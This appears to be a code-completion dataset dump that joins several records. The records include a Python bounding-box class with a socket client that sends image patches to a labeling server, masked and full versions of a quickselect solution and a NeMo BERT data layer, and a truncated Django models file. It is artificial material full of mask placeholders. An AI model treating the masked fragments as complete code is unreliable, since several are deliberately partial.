fromPointBoundingBoxes(boxes):\n\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n\n # return array like bounding box\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n\n # return tuple of end points\n return ((self.x, self.y), (self.x + self.w, self.y + self.h))\n\n def area(self):\n\n return self.h * self.w\n\n def __or__(self, other_box):\n\n # initialize resultant box\n rbox = RBox()\n\n # calculate values\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n\n return rbox\n\n def __and__(self, other_box):\n\n # initialize resultant box\n rbox = RBox()\n\n # calculate values\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n\n if rbox.w < 0 or rbox.h < 0:\n\n # reinitailize or make it zero\n rbox = RBox()\n\n return rbox\n\n def similarity(self, other_box):\n\n # (A & B)/(A | B) = (A & B).area/(A.area + B.area - (A & B).area)\n #return (self & other_box).area()/(self.area() + other_box.area() - (self & other_box).area())\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area()/min_area\n\n def __str__(self):\n\n return \"{} {} {} {}\".format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n\n # calculate similarity and return\n return self.similarity(other_box)\n\n def __eq__(self, other):\n\n return self.x == other.x and self.y == other.y and self.w == other.w and self.h == other.h\n\n @staticmethod\n def similarityStats(boxes):\n\n # create matrix out of boxes\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n\n # return similarity matrix\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold = 0.8):\n\n # get similarity matrix\n sim_mat = RBox.similarityStats(boxes)\n\n # find thresholded indexes\n ind = np.array(np.nonzero(sim_mat > threshold))\n\n # return in the form of list\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n\n while len(similar_boxes) > 0:\n\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n\n # remove similar boxes\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n\n boxes.append(union)\n\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n\n # get bounding box end points\n (start, end) = self.pointBoundingBox()\n start, end = list(start), list(end)\n\n # check if square flag is on\n if square:\n\n im_h, im_w = image.shape[0:2]\n\n # adjust start and end so that height and width are equal\n if self.h != self.w:\n\n # find bigger size\n if self.h > self.w:\n\n # find difference\n diff = self.h - self.w\n\n if start[0] >= int(diff/2):\n\n start[0] -= math.floor(diff/2)\n diff -= math.floor(diff/2)\n else:\n\n diff -= start[0]\n start[0] = 0\n\n end[0] += diff\n\n if end[0] >= im_w:\n\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n\n # find difference\n diff = self.w - self.h\n\n if start[1] >= int(diff / 2):\n\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n\n diff -= start[1]\n start[1] = 0\n\n end[1] += diff\n\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n\n # return patch\n return image[start[1]: end[1], start[0]: end[0]]\n\n def addPatchtoImage(self, image, patch):\n\n # get bounding box end points\n (start, end) = self.pointBoundingBox()\n\n # patch in to image\n image[start[1]: end[1], start[0]: end[0]] = patch\n\n # return image\n return image\n\ndef askForLable(patch):\n\n # write an image to send\n cv2.imwrite(\"patch.jpg\", patch)\n\n # setup client socket\n clientSock = socket(AF_INET, SOCK_STREAM)\n clientSock.connect((TCP_IP, TCP_PORT))\n\n # open image\n image = open(\"patch.jpg\", 'rb')\n\n # read bytes equal to buffer size\n data = image.read(BUFFER_SIZE)\n\n # while image still has data\n while (data):\n\n # send data to server\n clientSock.send(data)\n\n # read more data if available\n data = image.read(BUFFER_SIZE)\n\n # close file\n image.close()\n\n # signal server to end data stream\n clientSock.shutdown(SHUT_WR)\n\n # recieved lable as binary data from server and convert it to string\n label = clientSock.recv(1024)\n label = label.decode(\"utf-8\")\n\n return label\n",
"step-ids": [
23,
26,
28,
37,
41
]
}
|
[
23,
26,
28,
37,
41
] |
<|reserved_special_token_0|>
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
<|reserved_special_token_0|>
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.setrecursionlimit(10 ** 6)
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
if __name__ == '__main__':
N, K = read_list_int()
A = read_list_int()
print(get_kth_number(A, K))
<|reserved_special_token_1|>
import sys
sys.setrecursionlimit(10 ** 6)
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
if __name__ == '__main__':
N, K = read_list_int()
A = read_list_int()
print(get_kth_number(A, K))
<|reserved_special_token_1|>
# Title: K번째 수
# Link: https://www.acmicpc.net/problem/11004
import sys
sys.setrecursionlimit(10 ** 6)
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k-1 == pivot_index:
return nums[k-1]
elif k-1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
# TLE
# selection_sort(nums, k)
return quick_select(nums, 0, len(nums)-1, k)
if __name__ == '__main__':
N, K = read_list_int()
A = read_list_int()
print(get_kth_number(A, K))
|
flexible
|
{
"blob_id": "f4ab6df8efc334fa338ade7deecd36d8cd859e96",
"index": 4174,
"step-1": "<mask token>\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\n<mask token>\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\ndef read_single_int():\n return int(sys.stdin.readline().strip())\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.setrecursionlimit(10 ** 6)\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\ndef read_single_int():\n return int(sys.stdin.readline().strip())\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\nif __name__ == '__main__':\n N, K = read_list_int()\n A = read_list_int()\n print(get_kth_number(A, K))\n",
"step-4": "import sys\nsys.setrecursionlimit(10 ** 6)\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\ndef read_single_int():\n return int(sys.stdin.readline().strip())\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\nif __name__ == '__main__':\n N, K = read_list_int()\n A = read_list_int()\n print(get_kth_number(A, K))\n",
"step-5": "# Title: K번째 수\r\n# Link: https://www.acmicpc.net/problem/11004\r\n\r\nimport sys\r\n\r\nsys.setrecursionlimit(10 ** 6)\r\n\r\n\r\ndef read_list_int():\r\n return list(map(int, sys.stdin.readline().strip().split(' ')))\r\n\r\n\r\ndef read_single_int():\r\n return int(sys.stdin.readline().strip())\r\n\r\n\r\ndef selection_sort(nums, k):\r\n sorted_index = 0\r\n while True:\r\n minimum = 9999999999\r\n min_index = 0\r\n for i, n in enumerate(nums[sorted_index:], sorted_index):\r\n if n < minimum:\r\n minimum = n\r\n min_index = i\r\n k -= 1\r\n if k == 0:\r\n return minimum\r\n nums[sorted_index], nums[min_index] = nums[min_index], nums[sorted_index]\r\n sorted_index += 1\r\n\r\n\r\ndef partition(nums, left, right, pivot_index):\r\n pivot_value = nums[pivot_index]\r\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\r\n store_index = left\r\n for i in range(left, right):\r\n if nums[i] < pivot_value:\r\n nums[store_index], nums[i] = nums[i], nums[store_index]\r\n store_index += 1\r\n nums[right], nums[store_index] = nums[store_index], nums[right]\r\n return store_index\r\n\r\n\r\ndef quick_select(nums, left, right, k):\r\n while True:\r\n if left == right:\r\n return nums[left]\r\n pivot_index = right\r\n pivot_index = partition(nums, left, right, pivot_index)\r\n if k-1 == pivot_index:\r\n return nums[k-1]\r\n elif k-1 < pivot_index:\r\n right = pivot_index - 1\r\n else:\r\n left = pivot_index + 1\r\n\r\n\r\ndef get_kth_number(nums, k):\r\n # TLE\r\n # selection_sort(nums, k)\r\n return quick_select(nums, 0, len(nums)-1, k)\r\n\r\n\r\nif __name__ == '__main__':\r\n N, K = read_list_int()\r\n A = read_list_int()\r\n print(get_kth_number(A, K))\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class BertPretrainingDataLayer(DataLayerNM):
<|reserved_special_token_0|>
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
<|reserved_special_token_0|>
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BertPretrainingDataLayer(DataLayerNM):
<|reserved_special_token_0|>
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (
1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):
AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':
NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),
'output_ids': NeuralType({(0): AxisType(BatchTag), (1):
AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(
BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):
AxisType(BatchTag)})}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
from nemo.backends.pytorch.nm import DataLayerNM
from nemo.core.neural_types import *
from nemo.core import DeviceType
import torch
from .datasets import BertPretrainingDataset
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (
1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):
AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':
NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),
'output_ids': NeuralType({(0): AxisType(BatchTag), (1):
AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(
BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):
AxisType(BatchTag)})}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
# Copyright (c) 2019 NVIDIA Corporation
from nemo.backends.pytorch.nm import DataLayerNM
from nemo.core.neural_types import *
from nemo.core import DeviceType
import torch
from .datasets import BertPretrainingDataset
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {
"input_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_type_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"labels":
NeuralType({0: AxisType(BatchTag)}),
}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15,
**kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device(
"cuda" if self.placement in [DeviceType.GPU, DeviceType.AllGpu]
else "cpu"
)
self._dataset = BertPretrainingDataset(
tokenizer=tokenizer,
dataset=dataset,
name=name,
sentence_indices_filename=sentence_indices_filename,
max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
|
flexible
|
{
"blob_id": "a47ffd5df49ec627442a491f81a117b3e68ff50b",
"index": 2326,
"step-1": "<mask token>\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n <mask token>\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n <mask token>\n\n @property\n def data_iterator(self):\n return None\n",
"step-2": "<mask token>\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n <mask token>\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-3": "<mask token>\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n\n @staticmethod\n def create_ports():\n input_ports = {}\n output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (\n 1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):\n AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':\n NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),\n 'output_ids': NeuralType({(0): AxisType(BatchTag), (1):\n AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(\n BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):\n AxisType(BatchTag)})}\n return input_ports, output_ports\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-4": "from nemo.backends.pytorch.nm import DataLayerNM\nfrom nemo.core.neural_types import *\nfrom nemo.core import DeviceType\nimport torch\nfrom .datasets import BertPretrainingDataset\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n\n @staticmethod\n def create_ports():\n input_ports = {}\n output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (\n 1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):\n AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':\n NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),\n 'output_ids': NeuralType({(0): AxisType(BatchTag), (1):\n AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(\n BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):\n AxisType(BatchTag)})}\n return input_ports, output_ports\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-5": "# Copyright (c) 2019 NVIDIA Corporation\n\nfrom nemo.backends.pytorch.nm import DataLayerNM\nfrom nemo.core.neural_types import *\nfrom nemo.core import DeviceType\nimport torch\nfrom .datasets import BertPretrainingDataset\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n @staticmethod\n def create_ports():\n input_ports = {}\n output_ports = {\n \"input_ids\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"input_type_ids\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"input_mask\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"output_ids\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"output_mask\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"labels\":\n NeuralType({0: AxisType(BatchTag)}),\n }\n\n return input_ports, output_ports\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15,\n **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n\n self._device = torch.device(\n \"cuda\" if self.placement in [DeviceType.GPU, DeviceType.AllGpu]\n else \"cpu\"\n )\n\n self._dataset = BertPretrainingDataset(\n tokenizer=tokenizer,\n dataset=dataset,\n name=name,\n sentence_indices_filename=sentence_indices_filename,\n max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.utils.text import slugify
from pyexpat import model
from django.db import models
# Create your models here.
from rest_framework_simplejwt.state import User
FREQUENCY = (
('daily', 'Diario'),
('weekly', 'Semanal'),
('monthly', 'Mensual')
)
class Tags(models.Model):
name = models.CharField(max_length=100)
slug = models.CharField(max_length=150)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
def save(self, *arg, **kwargs):
if not self.slug:
self.slug = slugify(self.name)
super(Tags, self).save(*arg, **kwargs)
class Meta:
ordering = ('-created_at',)
class Newsletter(models.Model):
name = models.CharField(max_length=200)
description = models.CharField(max_length=10000)
image = models.ImageField()
